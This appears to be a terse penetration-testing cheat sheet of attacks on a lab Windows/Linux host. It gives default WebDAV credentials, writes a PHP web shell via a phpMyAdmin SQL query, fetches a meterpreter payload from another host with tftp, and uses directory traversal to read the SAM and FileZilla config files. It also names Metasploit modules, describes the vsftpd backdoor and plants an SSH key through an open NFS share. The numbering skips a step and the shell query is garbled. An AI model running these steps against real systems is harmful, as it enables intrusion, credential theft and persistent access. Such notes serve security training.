(1) Webdav Default Credentials
Default -> wampp:xampp
a. cadaver http://192.168.0.190/webdav
b. Use Msfvenom to create a PHP shell and upload
c. Use msfconsole to exploit
(2) Open phpMyAdmin
a. Create a php shell on the Apache server using a SQL query
SELECT ““”””” into outfile “C:\\xampp\\htdocs\\shell.php”
http://192.168.0.190/shell.php?cmd=ipconfig
b. Add a meterpreter PHP file
http://192.168.0.190/shell.php?cmd=tftp 172.16.85.131 get meterpreter.php C:\\xampp\\htdocs\\meterpreter.php
Zervit 0.4 directory traversal
nc 192.168.20.10 3232 GET /../../../../../boot.ini HTTP/1.1
http://192.168.0.190:3232/index.html?../../../../../../xampp/FileZillaFtp/FileZilla%20Server.xml
http://192.168.0.190:3232/index.html?../../../../../../WINDOWS/repair/sam
(4) Exploiting a Buffer Overflow
Buffer overflow in SLMail
windows/pop3/seattlelab_pass
(5) Exploiting a Web Application
Unsanitized parameter in graph_formula.php -> PHP code execution
unix/webapp/tikiwiki_graph_formula_exec
(6) Piggybacking on a Compromised Service
VsFTP -> backdoored
Username ending in a 🙂 spawned a backdoor on port 6200
(7) Exploiting Open NFS Shares
NFS on port 2049
showmount –e 172.16.85.136
ssh-keygen
mkdir /tmp/r00t/
mount -t nfs –o nolock 172.16.85.136:/export/username/ /tmp/r00t/
cat ~/.ssh/id_rsa.pub >> /tmp/r00t/.ssh/authorized_keys
umount /tmp/r00t/
Reverse Engineering, Malware Deep Insight 